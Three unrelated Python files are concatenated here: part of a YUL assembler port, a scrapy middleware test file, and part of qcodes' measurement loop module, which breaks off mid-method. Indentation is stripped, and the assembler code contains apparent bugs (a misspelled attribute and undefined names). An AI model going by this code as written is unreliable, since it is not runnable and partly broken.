if mem_type != MemType.ERASABLE or hi_lim > self.m_typ_tab[midx][1]:
popo.health |= Bit.BIT13
return self.er_loc_sym(popo, low_lim)
# Check availability of block.
loc_loc = low_lim
while loc_loc <= hi_lim:
if not self.avail(loc_loc, reserve=True):
# Signal conflict.
popo.health |= Bit.BIT14
loc_loc += 1
return self.er_loc_sym(popo, low_lim)
def er_loc_sym(self, popo, low_lim=0):
# Analyze location field of non-leftover.
common, value = self.anal_subf(popo.loc_field(), popo)
if self._field_cod[0] == 0:
# OK exit if blank.
return self.send_popo(popo)
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) == unsigned_mask:
# Error exit if unsigned numeric.
popo.health |= Bit.BIT16
return self.send_popo(popo)
elif self._field_cod[0] != FieldCodBit.SYMBOLIC:
# OK exit if signed numeric.
return self.send_popo(popo)
# Analyze location symbol.
popo.health |= Bit.BIT8
sym_name = common.strip()
symbol = self.anal_symb(sym_name)
# Error exit if symbol table is full.
if symbol is None:
popo.health |= Bit.BIT16
return self.send_popo(popo)
# Get address of location transforms.
sym_xform = self._xforms[symbol.health]
# Symbol health becomes F if illeg. adr.
if popo.health & Bit.BIT11:
new_health = 0xF
return self.end_is(popo, 0, symbol, new_health)
# Select and apply transform for erase location symbol.
if popo.health & Bit.BIT12:
# Use transform for oversize assignment.
new_health = (sym_xform >> 7*4) & 0xF
return self.end_is(popo, 0, symbol, new_health)
if popo.health & Bit.BIT13:
# Use transform for oversize assignment.
new_health = (sym_xform >> 6*4) & 0xF
return self.end_is(popo, low_lim, symbol, new_health)
if popo.health & Bit.BIT14:
# Use transform for conflict.
new_health = (sym_xform >> 5*4) & 0xF
return self.end_is(popo, low_lim, symbol, new_health)
# Use normal erase transform.
new_health = (sym_xform >> 8*4) & 0xF
return self.end_is(popo, low_lim, symbol, new_health)
def eras_lefto(self, popo, adr_wd):
# FIXME: implement leftovers
pass
def octal(self, popo):
popo.health |= HealthBit.CARD_TYPE_OCTAL
return self.inst_dec_oct(popo)
def instruct(self, popo):
popo.health |= HealthBit.CARD_TYPE_INSTR
return self.inst_dec_oct(popo)
def decimal(self, popo):
popo.health |= HealthBit.CARD_TYPE_DECML
return self.inst_dec_oct(popo)
def _2octal(self, popo):
popo.health |= HealthBit.CARD_TYPE_2OCTAL
return self._2oct_2dec(popo)
def _2decimal(self, popo):
popo.health |= HealthBit.CARD_TYPE_2DECML
return self._2oct_2dec(popo)
def _2oct_2dec(self, popo):
# Set up later test
self._save_loc = ONES
self._yul.switch &= ~MemType.MEM_MASK
self._yul.switch |= MemType.FIXED
if popo.card[0] == 'J':
# FIXME: Implement leftovers!
pass
else:
# Translate regular location field.
self._loc_state = 0
self.location(popo)
popo.health |= self._loc_state
if popo.health & (Bit.BIT12 | Bit.BIT14) != 0:
# Exit if leftover or oversize location.
return self.send_popo(popo)
# Branch if loc ctr was not saved.
if self._save_loc < ONES:
self._loc_ctr = (popo.health & 0xFFFF) + 1
loc_value = self._loc_ctr
# Branch if size of 2nd loc is OK.
if not self.incr_lctr() or loc_value > self.max_loc:
popo.health |= Bit.BIT14
self._loc_ctr = ONES
return self.dp_loc_end(popo)
# Find memory type (this happened in LOCATION, but wasn't saved in this port)
midx = 0
while loc_value > self.m_typ_tab[midx][1]:
midx += 1
# Branch if 1st loc in bad memory type or end of category.
if (popo.health & Bit.BIT15) or (popo.health & 0xFFFF == self.m_typ_tab[midx][1]):
# Which would mean type error on at least one of the locations.
popo.health |= Bit.BIT15
if popo.health & HealthBit.SYMBOLIC:
# If loc is symbolic and in table, use the DP type error transformation.
sym_xform = 0xFEECEE9EC900FEEC
symbol = self.anal_symb(popo.loc_field().strip())
symbol.health = (sym_xform >> (symbol.health*4)) & 0xF
return self.dp_loc_end(popo)
# Test and reserve 2nd location. Branch if it was available.
if not self.avail(loc_value, reserve=True):
popo.health |= Bit.BIT16
# With same conditions as for type error, use DP conflict transform.
if popo.health & HealthBit.SYMBOLIC:
sym_xform = 0xFEDEEAEEDA00FEDE
symbol = self.anal_symb(popo.loc_field().strip())
symbol.health = (sym_xform >> (symbol.health*4)) & 0xF
return self.dp_loc_end(popo)
def dp_loc_end(self, popo):
if self._save_loc < ONES:
# Restore loc ctr and exit.
self._loc_ctr = self._save_loc
return self.send_popo(popo)
def even(self, popo):
if popo.health & HealthBit.ASTERISK:
# Asterisk makes illegal op.
return self.illegop(popo)
if not popo.address_1().isspace() or not popo.address_2().isspace():
# Cuss mildly at non-blank address fields.
popo.health |= Bit.BIT13
if self._loc_ctr >= self.max_loc:
# Cuss attempt to fly off the end.
popo.health |= Bit.BIT14
elif self._loc_ctr & 1:
# Location is odd, so add one.
self._loc_ctr += 1
popo.health |= HealthBit.CARD_TYPE_EVEN
return self.ch_il_size(popo, self._loc_ctr, [None, None])
def is_equals(self, popo):
popo.health |= HealthBit.CARD_TYPE_EQUALS
return self.decod_adr(popo, 0)
def equ_minus(self, popo):
popo.health |= HealthBit.CARD_TYPE_EQUALS
return self.decod_adr(popo, self._loc_ctr)
def equ_plus(self, popo):
popo.health |= HealthBit.CARD_TYPE_EQUALS
return self.decod_adr(popo, -self._loc_ctr)
def setloc(self, popo):
popo.health |= HealthBit.CARD_TYPE_SETLOC
return self.decod_adr(popo, 0)
def decod_adr(self, popo, loc_loc):
# Asterisk makes illegal op.
if popo.health & HealthBit.ASTERISK:
return self.illegop(popo)
# Decode address field.
adr_wd = self.adr_field(popo)
# Abort if meaningless address field.
if self._field_cod[0] is None:
popo.health |= HealthBit.MEANINGLESS
return self.no_adress(popo, adr_wd)
# Bad loc ctr kills =PLUS and =MINUS now.
if loc_loc >= ONES:
return self.ch_il_size(popo, loc_loc, adr_wd, check_loc=False)
# If blank adr field, fake up absolute.
if self._field_cod[0] == 0:
self._field_cod[0] = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if self._loc_ctr >= ONES:
return self.ch_il_size(popo, loc_loc, adr_wd, check_loc=False)
adr_wd[0] = self._loc_ctr
self._field_cod[1] = 0
if self._field_cod[1] == 0:
# Fake up a modifier if it lacks one.
self._field_cod[1] = FieldCodBit.NUMERIC
adr_wd[1] = loc_loc
else:
# Combine loc ctr with exisiting modifier.
adr_wd[1] += loc_loc
# Set up sign of net modifier.
if adr_wd[1] > 0:
self._field_cod[1] |= FieldCodBit.POSITIVE
else:
self._field_cod[1] &= ~FieldCodBit.POSITIVE
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) == unsigned_mask:
# Branch if main part is unsigned numeric.
pass
elif self._field_cod[0] == FieldCodBit.SYMBOLIC:
# Branch if address field contains a sym.
return self.sym_is_loc(popo, loc_loc, adr_wd)
elif self._loc_ctr >= ONES:
# Branch if location counter is bad.
return self.ch_il_size(popo, loc_loc, adr_wd, check_loc=False)
else:
# Form address relative to L.C. setting.
adr_wd[0] += self._loc_ctr
# Add modifier part to unsigned numeric.
adr_wd[0] += adr_wd[1]
# Go to test size of num + modifier.
loc_loc = adr_wd[0]
return self.ch_il_size(popo, loc_loc, adr_wd)
def sym_is_loc(self, popo, loc_loc, adr_wd):
# Analyze address symbol history.
sym_name = adr_wd[0].strip()
symbol = self.anal_symb(sym_name)
# Exit if symbol table is full.
if symbol is None:
popo.health |= Bit.BIT16
return self.no_adress(popo, adr_wd, symbol)
# Store address of address symbol.
popo.health |= (symbol.index + 1) << 16
if symbol.health > 0x0 and symbol.health < 0x3:
# Signal address nearly defined.
popo.health |= HealthBit.NEARLY_DEFINED
return self.no_adress(popo, adr_wd, symbol)
# Use health of symbol to find transform.
sym_xform = self._xforms[symbol.health]
# Test predefinition bit.
if not sym_xform & 0x1000000000:
# Signal address undefined as yet.
popo.health |= HealthBit.UNDEFINED
return self.no_adress(popo, adr_wd, symbol)
# Test def/no-def bit.
if not sym_xform & 0x2000000000:
popo.health |= HealthBit.ILL_DEFINED
return self.no_adress(popo, adr_wd, symbol)
# Add modifier to symbol definition.
loc_loc = symbol.value
loc_loc += adr_wd[1]
return self.ch_il_size(popo, loc_loc, adr_wd, symbol)
def ch_il_size(self, popo, loc_loc, adr_wd, adr_symbol=None, check_loc=True):
if not check_loc or loc_loc >= ONES:
popo.health |= HealthBit.OVERSIZE
return self.no_adress(popo, adr_wd, adr_symbol)
popo.health |= loc_loc & 0xFFFF
# Branch for normal IS,= path.
if (popo.health & HealthBit.CARD_TYPE_MASK) == HealthBit.CARD_TYPE_EQUALS:
return self.iseq_lsym(popo, loc_loc, adr_wd, adr_symbol)
# Look up memory type for setloc.
midx = 0
while loc_loc > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
if mem_type == MemType.SPEC_NON:
# Signal setloc to spec/non memory.
popo.health |= Bit.BIT10
else:
self._loc_ctr = popo.health & 0xFFFF
return self.nd_setloc(popo)
def nd_setloc(self, popo):
if not popo.loc_field().isspace():
# Cuss about non-blank loc field in loc.
popo.health |= HealthBit.SYMBOLIC
return self.send_popo(popo)
def iseq_lsym(self, popo, loc_loc, adr_wd, adr_symbol=None):
common, value = self.anal_subf(popo.loc_field(), popo)
if self._field_cod[0] != FieldCodBit.SYMBOLIC:
return self.send_popo(popo)
# Signal symb locn, get symbol history.
popo.health |= HealthBit.SYMBOLIC
sym_name = common.strip()
symbol = self.anal_symb(sym_name)
# Abort if symbol table is full.
if symbol is None:
popo.health |= Bit.BIT15
return self.send_popo(popo)
# Save symbol, get address of transform.
sym_xform = self._xforms[symbol.health]
if symbol.health <= 2 or symbol.heatlh != 5:
# Branch if loc sym was not leftover.
return self.it_is(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol, check_loc=True)
# Branch if an OK definition was made.
if loc_loc >= ONES:
# Throw up hands if EQUALS failed to def.
new_health = 0xF
return self.not_ok_def(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol)
if symbol.value < 0:
# When symbol goes with leftover erase.
sym_type = MemType.ERASABLE
else:
# When symbol goes with lefto con or inst.
sym_type = MemType.FIXED
# Branch when memory type is known.
midx = 0
while loc_loc > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
# Br if leftover equated to wrong type.
if sym_type != mem_type:
# Indicate type error in symbol table.
new_health = 0xC
return self.end_is(popo, loc_loc, symbol, new_health)
hi_lim = loc_loc + abs(sym.value)
if hi_lim > self._m_typ_tab[midx][1]:
new_health = 0xC
return self.end_is(popo, loc_loc, symbol, new_health)
for loc in range(loc_loc, hi_lim):
if not self.avail(loc, reserve=True):
# Force special transform if conflict
sym_xform = 0xA000
adr_wd[1] = hi_lim
return self.it_is(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol)
def it_is(self, popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol=None, check_loc=False):
if check_loc and loc_loc >= ONES:
return self.not_ok_def(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol)
new_health = (sym_xform >> 3*4) & 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
def end_is(self, popo, loc_loc, symbol, new_health):
self._loc_state = LocStateBit.SYMBOLIC
self.sy_def_xit(loc_loc, symbol, new_health)
# Exit unless loc symbol failed to fit.
b8b17 = Bit.BIT8 | Bit.BIT17
if (self._loc_state & b8b17) != b8b17:
return self.send_popo(popo)
# Branch if op code is equals.
if popo.health & HealthBit.CARD_TYPE_EQUALS:
# Show unfitting of equals loc sym.
popo.health |= Bit.BIT15
else:
# Show unfitting of erase loc sym.
popo.health |= Bit.BIT15
return self.send_popo(popo)
def not_ok_def(self, popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol=None):
if popo.health & Bit.BIT13:
new_health = 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
if popo.health & Bit.BIT14:
new_health = (sym_xform >> 1*4) & 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
if abs(adr_wd[1]) > 0o77777:
popo.health |= HealthBit.OVERSIZE
new_health = (sym_xform >> 1*4) & 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
symbol.definer = adr_symbol.name
if symbol.name not in adr_symbol.definees:
adr_symbol.definees.append(symbol.name)
new_health = (sym_xform >> 2*4) & 0xF
return self.end_is(popo, adr_wd[1], symbol, new_health)
def no_adress(self, popo, adr_wd, adr_symbol=None):
if (popo.health & HealthBit.CARD_TYPE_MASK) != HealthBit.CARD_TYPE_EQUALS:
return self.nd_setloc(popo)
loc_loc = ONES
return self.iseq_lsym(popo, loc_loc, adr_wd, adr_symbol)
def block(self, popo):
# Asterisk makes illegal op.
if popo.health & HealthBit.ASTERISK:
return self.illegop(popo)
# Decode address field.
adr_wd = self.adr_field(popo)
if self._field_cod[0] is None or self._field_cod[0] & FieldCodBit.SYMBOLIC:
# When address field is meaningless or there is no numeric part.
return self.ilfo_blok(popo)
# Branch if address field is blank or main part is signed num.
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) != unsigned_mask:
if self._field_cod[0] != 0:
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
else:
adr_wd[1] += adr_wd[0]
if self._loc_ctr >= ONES:
# Cannot evaluate rel to bad location.
popo.health |= Bit.BIT14
return self.block_loc(popo)
# Set loc value to beginning of bank.
loc_value = self._loc_ctr & ~self.blok_ones
# Show whether modifier is present
self._field_cod[1] = self._field_cod[0]
else:
# Shift amount supplied by initialization.
loc_value = adr_wd[0] << self.blok_shif
# Omit increase for blank bank.
if self._field_cod[0] != 0:
loc_value += (self.bank_inc << self.blok_shif)
# Branch if there is no modifier.
if self._field_cod[1] != 0:
# Error if modifier is minus or modifier greater than block size.
if adr_wd[1] < 0 or adr_wd[1] > self.blok_ones:
return self.ilfo_blok(popo)
# Add modifier to shifted numeric.
loc_value += adr_wd[1]
if loc_value > self.max_loc:
# Exit for no such block.
popo.health |= Bit.BIT11
return self.block_loc(popo)
# Look up memory type.
midx = 0
while loc_value > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
# Branch if in fixed or erasable.
if mem_type == MemType.SPEC_NON:
# Memory type error exit.
popo.health |= Bit.BIT13
return self.block_loc(popo)
loc = loc_value
# Form end of major block.
loc_value |= self.blok_ones
# Branch if major block end comes first.
if loc_value > self.m_typ_tab[midx][1]:
# When minor block end comes first.
loc_value = self.m_typ_tab[midx][1]
# Non-destructive availability test.
while loc <= loc_value:
# Branch if available.
if self.avail(loc, reserve=False):
# Store found address.
popo.health |= loc
# Set loc ctr accordingly.
self._loc_ctr = loc
return self.block_loc(popo)
loc += 1
# When block is full.
popo.health |= Bit.BIT10
return self.block_loc(popo)
def ilfo_blok(self, popo):
popo.health |= Bit.BIT12
return self.block_loc(popo)
def block_loc(self, popo):
if not popo.loc_field().isspace():
popo.health |= Bit.BIT8
popo.health |= HealthBit.CARD_TYPE_BLOCK
return self.send_popo(popo)
def subro(self, popo):
pass
def count(self, popo):
pass
def late_mem(self, popo):
popo.health |= HealthBit.CARD_TYPE_2LATE
return self.send_popo(popo)
def inish_p1(mon, yul):
# Move freeze indicator to bit 8, B17=0
if yul.switch & SwitchBit.FREEZE:
yul.switch &= ~SwitchBit.FREEZE
yul.switch |= SwitchBit.FREEZE_P1
comp_pass1 = mon.phi_load(yul.comp_name + '.PASS1', yul)
if comp_pass1 is None:
yul.typ_abort()
comp_pass1.m_special()
|
the-stack_0_25997
|
import pytest
from scrapy.http import Request
from scrapy.spiders import Spider
from scrapy.utils.test import get_crawler
from scrapy.exceptions import IgnoreRequest
from scrapy_count_filter.middleware import GlobalCountFilterMiddleware, HostsCountFilterMiddleware
def _mock_mw(spider, mwcls):
class MockedDownloader:
slots = {}
def _get_slot_key(self, a, b):
return str(a) + str(b)
class MockedEngine:
downloader = MockedDownloader()
fake_spider_closed_result = None
def close_spider(self, spider, reason):
self.fake_spider_closed_result = (spider, reason)
# with `spider` instead of `type(spider)` raises an exception
crawler = get_crawler(type(spider))
crawler.engine = MockedEngine()
return mwcls.from_crawler(crawler)
def test_g_disabled():
spider = Spider('spidr')
mw = _mock_mw(spider, GlobalCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.counter['page_count'] == 2
assert mw.crawler.engine.fake_spider_closed_result is None
def test_g_enabled():
spider = Spider('spidr')
spider.count_limits = {'page_count': 1, 'item_count': 1}
mw = _mock_mw(spider, GlobalCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.counter['page_count'] == 1
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.counter['page_count'] == 2
closed_result = mw.crawler.engine.fake_spider_closed_result
assert closed_result is not None
assert closed_result[1] == 'closespider_global_counters_overflow'
def test_h_disabled():
spider = Spider('spidr')
mw = _mock_mw(spider, HostsCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.page_host_counter['quotes.toscrape.com'] == 2
def test_h_enabled():
spider = Spider('spidr')
spider.count_limits = {'page_host_count': 1, 'item_host_count': 1}
mw = _mock_mw(spider, HostsCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
with pytest.raises(IgnoreRequest):
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.page_host_counter['quotes.toscrape.com'] == 2
|
the-stack_0_25998
|
"""
Data acquisition loops.
The general scheme is:
1. create a (potentially nested) Loop, which defines the sweep setpoints and
delays
2. activate the loop (which changes it to an ActiveLoop object),
or omit this step to use the default measurement as given by the
Loop.set_measurement class method.
3. run it with the .run method, which creates a DataSet to hold the data,
and defines how and where to save the data.
Some examples:
- set default measurements for later Loop's to use
>>> Loop.set_measurement(param1, param2, param3)
- 1D sweep, using the default measurement set
>>> Loop(sweep_values, delay).run()
- 2D sweep, using the default measurement set sv1 is the outer loop, sv2 is the
inner.
>>> Loop(sv1, delay1).loop(sv2, delay2).run()
- 1D sweep with specific measurements to take at each point
>>> Loop(sv, delay).each(param4, param5).run()
- Multidimensional sweep: 1D measurement of param6 on the outer loop, and the
default measurements in a 2D loop
>>> Loop(sv1, delay).each(param6, Loop(sv2, delay)).run()
Supported commands to .set_measurement or .each are:
- Parameter: anything with a .get method and .name or .names see
parameter.py for options
- ActiveLoop (or Loop, will be activated with default measurement)
- Task: any callable that does not generate data
- Wait: a delay
"""
from typing import Optional, Sequence
from datetime import datetime
import logging
import time
import numpy as np
from qcodes.station import Station
from qcodes.data.data_set import new_data
from qcodes.data.data_array import DataArray
from qcodes.utils.helpers import wait_secs, full_class, tprint
from qcodes.utils.metadata import Metadatable
from .actions import (_actions_snapshot, Task, Wait, _Measure, _Nest,
BreakIf, _QcodesBreak)
log = logging.getLogger(__name__)
def active_loop():
return ActiveLoop.active_loop
def active_data_set():
loop = active_loop()
if loop is not None and loop.data_set is not None:
return loop.data_set
else:
return None
class Loop(Metadatable):
"""
The entry point for creating measurement loops
Args:
sweep_values: a SweepValues or compatible object describing what
parameter to set in the loop and over what values
delay: a number of seconds to wait after setting a value before
continuing. 0 (default) means no waiting and no warnings. > 0
means to wait, potentially filling the delay time with monitoring,
and give an error if you wait longer than expected.
progress_interval: should progress of the loop every x seconds. Default
is None (no output)
After creating a Loop, you attach one or more ``actions`` to it, making an
``ActiveLoop``
TODO:
how? Maybe obvious but not specified! that you can ``.run()``,
or you can ``.run()`` a ``Loop`` directly, in which
case it takes the default ``actions`` from the default ``Station``
``actions`` is a sequence of things to do at each ``Loop`` step: that can be
a ``Parameter`` to measure, a ``Task`` to do (any callable that does not
yield data), ``Wait`` times, or another ``ActiveLoop`` or ``Loop`` to nest
inside this one.
"""
def __init__(self, sweep_values, delay=0, station=None,
progress_interval=None):
super().__init__()
if delay < 0:
raise ValueError('delay must be > 0, not {}'.format(repr(delay)))
self.sweep_values = sweep_values
self.delay = delay
self.station = station
self.nested_loop = None
self.actions = None
self.then_actions = ()
self.bg_task = None
self.bg_final_task = None
self.bg_min_delay = None
self.progress_interval = progress_interval
def __getitem__(self, item):
"""
Retrieves action with index `item`
Args:
item: actions index
Returns:
loop.actions[item]
"""
return self.actions[item]
def loop(self, sweep_values, delay=0):
"""
Nest another loop inside this one.
Args:
sweep_values:
delay (int):
Examples:
>>> Loop(sv1, d1).loop(sv2, d2).each(*a)
is equivalent to:
>>> Loop(sv1, d1).each(Loop(sv2, d2).each(*a))
Returns: a new Loop object - the original is untouched
"""
out = self._copy()
if out.nested_loop:
# nest this new loop inside the deepest level
out.nested_loop = out.nested_loop.loop(sweep_values, delay)
else:
out.nested_loop = Loop(sweep_values, delay)
return out
def _copy(self):
out = Loop(self.sweep_values, self.delay,
progress_interval=self.progress_interval)
out.nested_loop = self.nested_loop
out.then_actions = self.then_actions
out.station = self.station
return out
def each(self, *actions):
"""
Perform a set of actions at each setting of this loop.
TODO(setting vs setpoints) ? better be verbose.
Args:
*actions (Any): actions to perform at each setting of the loop
Each action can be:
- a Parameter to measure
- a Task to execute
- a Wait
- another Loop or ActiveLoop
"""
actions = list(actions)
# check for nested Loops, and activate them with default measurement
for i, action in enumerate(actions):
if isinstance(action, Loop):
default = Station.default.default_measurement
actions[i] = action.each(*default)
self.validate_actions(*actions)
if self.nested_loop:
# recurse into the innermost loop and apply these actions there
actions = [self.nested_loop.each(*actions)]
return ActiveLoop(self.sweep_values, self.delay, *actions,
then_actions=self.then_actions, station=self.station,
progress_interval=self.progress_interval,
bg_task=self.bg_task, bg_final_task=self.bg_final_task, bg_min_delay=self.bg_min_delay)
def with_bg_task(self, task, bg_final_task=None, min_delay=0.01):
"""
Attaches a background task to this loop.
Args:
task: A callable object with no parameters. This object will be
invoked periodically during the measurement loop.
bg_final_task: A callable object with no parameters. This object will be
invoked to clean up after or otherwise finish the background
task work.
min_delay (int, float): The minimum number of seconds to wait
between task invocations. Defaults to 0.01 s.
Note that if a task is doing a lot of processing it is recommended
to increase min_delay.
Note that the actual time between task invocations may be much
longer than this, as the task is only run between passes
through the loop.
"""
return _attach_bg_task(self, task, bg_final_task, min_delay)
@staticmethod
def validate_actions(*actions):
"""
Whitelist acceptable actions, so we can give nice error messages
if an action is not recognized
"""
for action in actions:
if isinstance(action, (Task, Wait, BreakIf, ActiveLoop)):
continue
if hasattr(action, 'get') and (hasattr(action, 'name') or
hasattr(action, 'names')):
continue
raise TypeError('Unrecognized action:', action,
'Allowed actions are: objects (parameters) with '
'a `get` method and `name` or `names` attribute, '
'and `Task`, `Wait`, `BreakIf`, and `ActiveLoop` '
'objects. `Loop` objects are OK too, except in '
'Station default measurements.')
def run(self, *args, **kwargs):
"""
shortcut to run a loop with the default measurement set
stored by Station.set_measurement
"""
default = Station.default.default_measurement
return self.each(*default).run(*args, **kwargs)
def run_temp(self, *args, **kwargs):
"""
shortcut to run a loop in the foreground as a temporary dataset
using the default measurement set
"""
return self.run(*args, quiet=True, location=False, **kwargs)
def then(self, *actions, overwrite=False):
"""
Attach actions to be performed after the loop completes.
These can only be ``Task`` and ``Wait`` actions, as they may not generate
any data.
returns a new Loop object - the original is untouched
This is more naturally done to an ActiveLoop (ie after .each())
and can also be done there, but it's allowed at this stage too so that
you can define final actions and share them among several ``Loops`` that
have different loop actions, or attach final actions to a Loop run
TODO:
examples of this ? with default actions.
Args:
*actions: ``Task`` and ``Wait`` objects to execute in order
overwrite: (default False) whether subsequent .then() calls (including
calls in an ActiveLoop after .then() has already been called on
the Loop) will add to each other or overwrite the earlier ones.
Returns:
a new Loop object - the original is untouched
"""
return _attach_then_actions(self._copy(), actions, overwrite)
def snapshot_base(self, update: bool = False,
params_to_skip_update: Optional[Sequence[str]] = None):
"""
State of the loop as a JSON-compatible dict (everything that
the custom JSON encoder class :class:'qcodes.utils.helpers.NumpyJSONEncoder'
supports).
Args:
update (bool): If True, update the state by querying the underlying
sweep_values and actions. If False, just use the latest values
in memory.
params_to_skip_update: Unused in this implementation.
Returns:
dict: base snapshot
"""
return {
'__class__': full_class(self),
'sweep_values': self.sweep_values.snapshot(update=update),
'delay': self.delay,
'then_actions': _actions_snapshot(self.then_actions, update)
}
def _attach_then_actions(loop, actions, overwrite):
"""Inner code for both Loop.then and ActiveLoop.then."""
for action in actions:
if not isinstance(action, (Task, Wait)):
raise TypeError('Unrecognized action:', action,
'.then() allows only `Task` and `Wait` '
'actions.')
if overwrite:
loop.then_actions = actions
else:
loop.then_actions = loop.then_actions + actions
return loop
def _attach_bg_task(loop, task, bg_final_task, min_delay):
"""Inner code for both Loop and ActiveLoop.bg_task"""
if loop.bg_task is None:
loop.bg_task = task
loop.bg_min_delay = min_delay
else:
raise RuntimeError('Only one background task is allowed per loop')
if bg_final_task:
loop.bg_final_task = bg_final_task
return loop
class ActiveLoop(Metadatable):
"""
Created by attaching ``actions`` to a ``Loop``, this is the object that
actually runs a measurement loop. An ``ActiveLoop`` can no longer be nested,
only run, or used as an action inside another ``Loop`` which will run the
whole thing.
The ``ActiveLoop`` determines what ``DataArrays`` it will need to hold the
data it collects, and it creates a ``DataSet`` holding these ``DataArrays``
"""
# Currently active loop, is set when calling loop.run(set_active=True)
# is reset to None when active measurement is finished
active_loop = None
def __init__(self, sweep_values, delay, *actions, then_actions=(),
station=None, progress_interval=None, bg_task=None,
bg_final_task=None, bg_min_delay=None):
super().__init__()
self.sweep_values = sweep_values
self.delay = delay
self.actions = list(actions)
self.progress_interval = progress_interval
self.then_actions = then_actions
self.station = station
self.bg_task = bg_task
self.bg_final_task = bg_final_task
self.bg_min_delay = bg_min_delay
self.data_set = None
# if the first action is another loop, it changes how delays
# happen - the outer delay happens *after* the inner var gets
# set to its initial value
self._nest_first = hasattr(actions[0], 'containers')
def __getitem__(self, item):
"""
Retrieves action with index `item`
Args:
item: actions index
Returns:
loop.actions[item]
"""
return self.actions[item]
def then(self, *actions, overwrite=False):
"""
Attach actions to be performed after the loop completes.
These can only be ``Task`` and ``Wait`` actions, as they may not
generate any data.
returns a new ActiveLoop object - the original is untouched
Args:
*actions: ``Task`` and ``Wait`` objects to execute in order
overwrite: (default False) whether subsequent .then() calls (including
calls in an ActiveLoop after .then() has already been called on
the Loop) will add to each other or overwrite the earlier ones.
"""
loop = ActiveLoop(self.sweep_values, self.delay, *self.actions,
then_actions=self.then_actions, station=self.station)
return _attach_then_actions(loop, actions, overwrite)
def with_bg_task(self, task, bg_final_task=None, min_delay=0.01):
"""
Attaches a background task to this loop.
Args:
task: A callable object with no parameters. This object will be
invoked periodically during the measurement loop.
bg_final_task: A callable object with no parameters. This object will be
invoked to clean up after or otherwise finish the background
task work.
min_delay (int, float): The minimum number of seconds to wait
between task invocations. Note that the actual time between
task invocations may be much longer than this, as the task is
only run between passes through the loop. Defaults to 0.01 s.
"""
return _attach_bg_task(self, task, bg_final_task, min_delay)
def snapshot_base(self, update=False,
params_to_skip_update: Optional[Sequence[str]] = None):
"""Snapshot of this ActiveLoop's definition."""
return {
'__class__': full_class(self),
'sweep_values': self.sweep_values.snapshot(update=update),
'delay': self.delay,
'actions': _actions_snapshot(self.actions, update),
'then_actions': _actions_snapshot(self.then_actions, update)
}
def containers(self):
"""
Finds the data arrays that will be created by the actions in this
loop, and nests them inside this level of the loop.
Recursively calls `.containers` on any enclosed actions.
"""
loop_size = len(self.sweep_values)
data_arrays = []
loop_array = DataArray(parameter=self.sweep_values.parameter,
is_setpoint=True)
loop_array.nest(size=loop_size)
data_arrays = [loop_array]
# hack set_data into actions
new_actions = self.actions[:]
if hasattr(self.sweep_values, "parameters"): # combined parameter
for parameter in self.sweep_values.parameters:
new_actions.append(parameter)
for i, action in enumerate(new_actions):
if hasattr(action, 'containers'):
action_arrays = action.containers()
elif hasattr(action, 'get'):
# this action is a parameter to measure
# note that this supports lists (separate output arrays)
# and arrays (nested in one/each output array) of return values
action_arrays = self._parameter_arrays(action)
else:
# this *is* covered but the report misses it because Python
# optimizes it away. See:
# https://bitbucket.org/ned/coveragepy/issues/198
continue # pragma: no cover
for array in action_arrays:
array.nest(size=loop_size, action_index=i,
set_array=loop_array)
data_arrays.extend(action_arrays)
return data_arrays
def _parameter_arrays(self, action):
out = []
# first massage all the input parameters to the general multi-name form
if hasattr(action, 'names'):
names = action.names
full_names = action.full_names
labels = getattr(action, 'labels', names)
if len(labels) != len(names):
raise ValueError('must have equal number of names and labels')
action_indices = tuple((i,) for i in range(len(names)))
elif hasattr(action, 'name'):
names = (action.name,)
full_names = (action.full_name,)
labels = (getattr(action, 'label', action.name),)
action_indices = ((),)
else:
raise ValueError('a gettable parameter must have .name or .names')
if hasattr(action, 'names') and hasattr(action, 'units'):
units = action.units
elif hasattr(action, 'unit'):
units = (action.unit,)
else:
units = tuple(['']*len(names))
num_arrays = len(names)
shapes = getattr(action, 'shapes', None)
sp_vals = getattr(action, 'setpoints', None)
sp_names = getattr(action, 'setpoint_names', None)
sp_labels = getattr(action, 'setpoint_labels', None)
sp_units = getattr(action, 'setpoint_units', None)
if shapes is None:
shapes = (getattr(action, 'shape', ()),) * num_arrays
sp_vals = (sp_vals,) * num_arrays
sp_names = (sp_names,) * num_arrays
sp_labels = (sp_labels,) * num_arrays
sp_units = (sp_units,) * num_arrays
else:
sp_blank = (None,) * num_arrays
# _fill_blank both supplies defaults and tests length
# if values are supplied (for shapes it ONLY tests length)
shapes = self._fill_blank(shapes, sp_blank)
sp_vals = self._fill_blank(sp_vals, sp_blank)
sp_names = self._fill_blank(sp_names, sp_blank)
sp_labels = self._fill_blank(sp_labels, sp_blank)
